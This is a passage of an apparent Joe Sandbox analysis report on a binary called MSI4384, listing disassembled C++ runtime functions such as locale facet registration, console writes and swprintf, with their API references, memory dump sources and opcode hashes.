                                                                    • Opcode ID: 1cd1d17f4bce1bf228e6899359bcecca4434213c3dcc801d6c81ccd4a6eb4a56
                                                                    • Instruction ID: dc5e78b0b5339cf6eae02b0a2ee66139669a7fcd81e9ba2bd68777ea4d788a48
                                                                    • Opcode Fuzzy Hash: 1cd1d17f4bce1bf228e6899359bcecca4434213c3dcc801d6c81ccd4a6eb4a56
                                                                    • Instruction Fuzzy Hash: 7201E171A00129EBDB04EFA59841ABE7761AF88718F15441FE4106B386DF789E058B89
                                                                    Function 0043A55D Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0043A564
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0043A56E
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • std::_Facet_Register.LIBCPMT ref: 0043A5BF
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0043A5DF
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID:
                                                                    • API String ID: 2854358121-0
                                                                    • Opcode ID: 44c735584ad0a9460f6843cbdfefe5d9974a7948e5dc8905c1ac43b0361e7077
                                                                    • Instruction ID: a2fb1df3586cdecc8e23fe996424612a1be0f771607568a31112c55550b60b9e
                                                                    • Opcode Fuzzy Hash: 44c735584ad0a9460f6843cbdfefe5d9974a7948e5dc8905c1ac43b0361e7077
                                                                    • Instruction Fuzzy Hash: FC01E132900115AFCB04BFA5D8456AE7765AF88718F21441EE410A7382DF788A008B8A
                                                                    Function 0044556A Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00445571
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0044557B
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • std::_Facet_Register.LIBCPMT ref: 004455CC
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 004455EC
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID:
                                                                    • API String ID: 2854358121-0
                                                                    • Opcode ID: 9551f482f4887e9cd00432b056987db7eb5d514a235155d8b820ea9460cea3cc
                                                                    • Instruction ID: c3769aa36ef10475d1eeb7534d73d3d00613d6ce3f6dc1f3ce7c5abb01191ce2
                                                                    • Opcode Fuzzy Hash: 9551f482f4887e9cd00432b056987db7eb5d514a235155d8b820ea9460cea3cc
                                                                    • Instruction Fuzzy Hash: 1501407590052AABDF04FFA5D8516BE7771AF88718F20041FF400AB382CF389E008B89
                                                                    Function 0043AFD7 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0043AFDE
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0043AFE8
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • std::_Facet_Register.LIBCPMT ref: 0043B039
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0043B059
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID:
                                                                    • API String ID: 2854358121-0
                                                                    • Opcode ID: 16c5e680db664f1cac6668fcb7707ac5c5600368fd317bb7339eedbea66951ca
                                                                    • Instruction ID: 42806b44d199c1c76bca995acc2de26076a4d0742178d5788f92d671d7e841a7
                                                                    • Opcode Fuzzy Hash: 16c5e680db664f1cac6668fcb7707ac5c5600368fd317bb7339eedbea66951ca
                                                                    • Instruction Fuzzy Hash: 65010031A001259BCB08FFA5D8816AE7775EF88B18F20441FE520AB391DF789A008BCD
                                                                    Function 00436624 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0043662B
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00436636
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 004366A4
                                                                      • Part of subcall function 00436787: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0043679F
                                                                    • std::locale::_Setgloballocale.LIBCPMT ref: 00436651
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_Setgloballocale
                                                                    • String ID:
                                                                    • API String ID: 677527491-0
                                                                    • Opcode ID: 4fb22876eed366283aaa776701ac5f3ae59bf15953b1432762bb854c8b8d8572
                                                                    • Instruction ID: f05b3293e70b0dc998eee0d715d400eda776acb17377cde8b0e0d32f002e2729
                                                                    • Opcode Fuzzy Hash: 4fb22876eed366283aaa776701ac5f3ae59bf15953b1432762bb854c8b8d8572
                                                                    • Instruction Fuzzy Hash: 3001F1B4A01111ABCB05EF20D85557C3B61BF88748F06805EE81113381DF786E05CBCD
                                                                    Function 0043A71C Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0043A723
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0043A72D
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • ctype.LIBCPMT ref: 0043A767
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0043A79E
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3ctype
                                                                    • String ID:
                                                                    • API String ID: 3358926169-0
                                                                    • Opcode ID: eba1b7a9867ef4ccaa7228d9a2814260b0365c808710d758edcc5badc5bd8790
                                                                    • Instruction ID: 69acb73ce606b2ae1f729abbcb362fbc1cac5fcf65d92d272d59fd56f482d60a
                                                                    • Opcode Fuzzy Hash: eba1b7a9867ef4ccaa7228d9a2814260b0365c808710d758edcc5badc5bd8790
                                                                    • Instruction Fuzzy Hash: AFF0C231A4011996DB05FAA18896BAE3220AF48718F50441EF5106B2D2DF3C8A04878A
                                                                    Function 00469BC7 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,004694C1,00000000,00000001,00000000,?,?,0046868E,?,00000000,00000000), ref: 00469BDE
                                                                    • GetLastError.KERNEL32(?,004694C1,00000000,00000001,00000000,?,?,0046868E,?,00000000,00000000,?,?,?,00468C31,00000000), ref: 00469BEA
                                                                      • Part of subcall function 00469BB0: CloseHandle.KERNEL32(FFFFFFFE,00469BFA,?,004694C1,00000000,00000001,00000000,?,?,0046868E,?,00000000,00000000,?,?), ref: 00469BC0
                                                                    • ___initconout.LIBCMT ref: 00469BFA
                                                                      • Part of subcall function 00469B71: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00469BA0,004694AE,?,?,0046868E,?,00000000,00000000,?), ref: 00469B84
                                                                    • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,004694C1,00000000,00000001,00000000,?,?,0046868E,?,00000000,00000000,?), ref: 00469C0F
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                    • String ID:
                                                                    • API String ID: 2744216297-0
                                                                    • Opcode ID: 87c6784345d3c6a9de574eaad43356dae5a74664ccafd43340aa4529644ef545
                                                                    • Instruction ID: d6f92c97c9ef7b1de6080c1c4923880d90daefb7c8409f994d69aaa9bb270f31
                                                                    • Opcode Fuzzy Hash: 87c6784345d3c6a9de574eaad43356dae5a74664ccafd43340aa4529644ef545
                                                                    • Instruction Fuzzy Hash: B7F03036001115BBCF221F91EC04A9E3F6AFF087A0F044135FE0995130E6B28C20EBDA
                                                                    Function 0043AB2F Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0043AB36
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0043AB40
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • moneypunct.LIBCPMT ref: 0043AB7A
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0043ABB1
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3moneypunct
                                                                    • String ID:
                                                                    • API String ID: 3160146232-0
                                                                    • Opcode ID: 16e9ae9ecfa8679e89a650c1cd2314ff2b85d17a8bd1d1f7d1be40d87caaff0a
                                                                    • Instruction ID: 1b8239e390d337ba071a348faad5f74258875a7858d994bdedf4b480636f86cb
                                                                    • Opcode Fuzzy Hash: 16e9ae9ecfa8679e89a650c1cd2314ff2b85d17a8bd1d1f7d1be40d87caaff0a
                                                                    • Instruction Fuzzy Hash: B6F05E31E4011996DB05FFA1C852BAE7325EF44B19F41441EF5016B282DF7C9A14879A
                                                                    Function 00468B4F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 196fileCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00468298: GetConsoleOutputCP.KERNEL32(F3E52339,00000000,00000000,?), ref: 004682FB
                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,00462C3F,?), ref: 00468CD4
                                                                    • GetLastError.KERNEL32(?,?,00462C3F,?,00462AD3,00000000,?,00000000,00462AD3,?,?,?,004803F8,0000002C,00462B44,?), ref: 00468CDE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: ConsoleErrorFileLastOutputWrite
                                                                    • String ID: ?,F
                                                                    • API String ID: 2915228174-1996027060
                                                                    • Opcode ID: 1b73ee2f98516057932ade05ab17bd0dbf29615bbc3db5cd0b7da0d0a15fe197
                                                                    • Instruction ID: 3dc6afcf03e74ee0780eb8b79fa110847d9a6100919e13e07bbef75c22c53b3c
                                                                    • Opcode Fuzzy Hash: 1b73ee2f98516057932ade05ab17bd0dbf29615bbc3db5cd0b7da0d0a15fe197
                                                                    • Instruction Fuzzy Hash: CF61B8B1900119AFDF11DFA8D844AEF7BB9BF19304F14025EE900A7252EB79D901CB6A
                                                                    Function 004444C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 193COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog3___cftoe
                                                                    • String ID: !%x
                                                                    • API String ID: 855520168-1893981228
                                                                    • Opcode ID: 37f56e9aaf89230ef3fcf8003387cfd60e131b6680a7a1660f99710377b415f8
                                                                    • Instruction ID: c186f301b01f646cb43fb0e6f4c180d547984c49da88cd2fcd2574818f92c2c7
                                                                    • Opcode Fuzzy Hash: 37f56e9aaf89230ef3fcf8003387cfd60e131b6680a7a1660f99710377b415f8
                                                                    • Instruction Fuzzy Hash: 5E717E71D00118AFEF18EFA8E881AEEB7F5EF48304F10452AF515A7251EB39AD51CB58
                                                                    Function 00448490 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 192COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog3___cftoe
                                                                    • String ID: !%x
                                                                    • API String ID: 855520168-1893981228
                                                                    • Opcode ID: c9591d86f62903051bd244bcef87863f996147e69bc498357f1bdee80b58200a
                                                                    • Instruction ID: 94e3eb89c9a970eabff587143eda2acab60c0645081b2ab7879f1acb2e8e25e8
                                                                    • Opcode Fuzzy Hash: c9591d86f62903051bd244bcef87863f996147e69bc498357f1bdee80b58200a
                                                                    • Instruction Fuzzy Hash: 37716E71E01219AFEF15DFA8D881AEEB7B5BF08304F14052EF815A7342EA399D45CB58
                                                                    Function 00434B8A Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 189COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00434B91
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                      • Part of subcall function 00428700: LocalAlloc.KERNEL32(00000040,00000000,0044A1C5,00000000,F3E52339,?,00000000,?,FFFFFFFF,?,0046EB28,000000FF,?,004217A4,?,0046FDDA), ref: 00428706
                                                                      • Part of subcall function 0042C3C0: __Getctype.LIBCPMT ref: 0042C3CA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$AllocGetctypeH_prolog3LocalLockit::_Lockit::~_
                                                                    • String ID: $9H$8H
                                                                    • API String ID: 3791111190-96789937
                                                                    • Opcode ID: a378b36a4291e6a567b6a5def2bdc34b83d989855aac2aa6e0c9e0be9131e4ef
                                                                    • Instruction ID: 818490f5e839ae66da509631a3c4a10c669fa9982c7d85ca0e3565b33e46f4eb
                                                                    • Opcode Fuzzy Hash: a378b36a4291e6a567b6a5def2bdc34b83d989855aac2aa6e0c9e0be9131e4ef
                                                                    • Instruction Fuzzy Hash: 71510BB1901215ABD7117FB28C42AFF7A68EF89354F50941FF90497282DB3CAD0087E9
                                                                    Function 00443640 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 00443647
                                                                    • _swprintf.LIBCMT ref: 004436BF
                                                                      • Part of subcall function 0043A71C: __EH_prolog3.LIBCMT ref: 0043A723
                                                                      • Part of subcall function 0043A71C: std::_Lockit::_Lockit.LIBCPMT ref: 0043A72D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog3H_prolog3_LockitLockit::__swprintfstd::_
                                                                    • String ID: %.0Lf
                                                                    • API String ID: 3614004578-1402515088
                                                                    • Opcode ID: 73411f2fc0a4316a245022b91df4a643e256ad7e9243c84b52907d559c8b69d4
                                                                    • Instruction ID: e01e2213fed61b09ff196732861ea21d450c8a0d26a4d8090fc63d00219b54bd
                                                                    • Opcode Fuzzy Hash: 73411f2fc0a4316a245022b91df4a643e256ad7e9243c84b52907d559c8b69d4
                                                                    • Instruction Fuzzy Hash: DE61BE71D00218ABDF05EFE4D885AEDBBB5FF08304F10451AE406AB391EB399A15CB84
                                                                    Function 00443970 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 00443977
                                                                    • _swprintf.LIBCMT ref: 004439EF
                                                                      • Part of subcall function 0042B7F0: std::_Lockit::_Lockit.LIBCPMT ref: 0042B81D
                                                                      • Part of subcall function 0042B7F0: std::_Lockit::_Lockit.LIBCPMT ref: 0042B840
                                                                      • Part of subcall function 0042B7F0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042B868
                                                                      • Part of subcall function 0042B7F0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042B911
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                                    • String ID: %.0Lf
                                                                    • API String ID: 1487807907-1402515088
                                                                    • Opcode ID: 677591d697ec0b487e154d3b3c5763849b7eef4d7afa9843b6daba678b9c2003
                                                                    • Instruction ID: ee90ff648f69ad0bc4b3580911ab90eece4d48ed5ec8bf51cb2851d898f2c5d5
                                                                    • Opcode Fuzzy Hash: 677591d697ec0b487e154d3b3c5763849b7eef4d7afa9843b6daba678b9c2003
                                                                    • Instruction Fuzzy Hash: 8961C171D00258AFDF05DFE4D844AEDBBB9FF48704F10451AE502AB291EB39AA15CF84
                                                                    Function 00448A0E Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 184COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: __aulldiv
                                                                    • String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
                                                                    • API String ID: 3732870572-1956417402
                                                                    • Opcode ID: fd72befaecc01382a2ca880e9c10c7ccad2f2020644411d5cf47c6c962ff3dca
                                                                    • Instruction ID: 2ae7c835f29d326b5f2d16e3c7641d9c696327418c612a2d749991b027a57952
                                                                    • Opcode Fuzzy Hash: fd72befaecc01382a2ca880e9c10c7ccad2f2020644411d5cf47c6c962ff3dca
                                                                    • Instruction Fuzzy Hash: C651D470A04288AFFF25CFBD88417AFBBF5AF45310F14445FE491A7341DAB899428B59
                                                                    Function 00448290 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 183COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 00448297
                                                                    • _swprintf.LIBCMT ref: 0044830F
                                                                      • Part of subcall function 0042C840: std::_Lockit::_Lockit.LIBCPMT ref: 0042C86D
                                                                      • Part of subcall function 0042C840: std::_Lockit::_Lockit.LIBCPMT ref: 0042C890
                                                                      • Part of subcall function 0042C840: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C8B8
                                                                      • Part of subcall function 0042C840: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C961
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                                    • String ID: %.0Lf
                                                                    • API String ID: 1487807907-1402515088
                                                                    • Opcode ID: d929f01668e800bd3d676facc3f23e86cc39a7e612b969013a1417c9482c1fa3
                                                                    • Instruction ID: 08ca1445ad7c7b416f74f2d7a564ff7381489247e935359fcfea87fe6d488e92
                                                                    • Opcode Fuzzy Hash: d929f01668e800bd3d676facc3f23e86cc39a7e612b969013a1417c9482c1fa3
                                                                    • Instruction Fuzzy Hash: 4761AD71E00218AFDF09DFE4D845AEEBBB5FF08304F10455EE506AB291EB399945CB88
                                                                    Function 0042FD40 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 171COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0042FF1C
                                                                    Strings
                                                                    Memory Dump Source
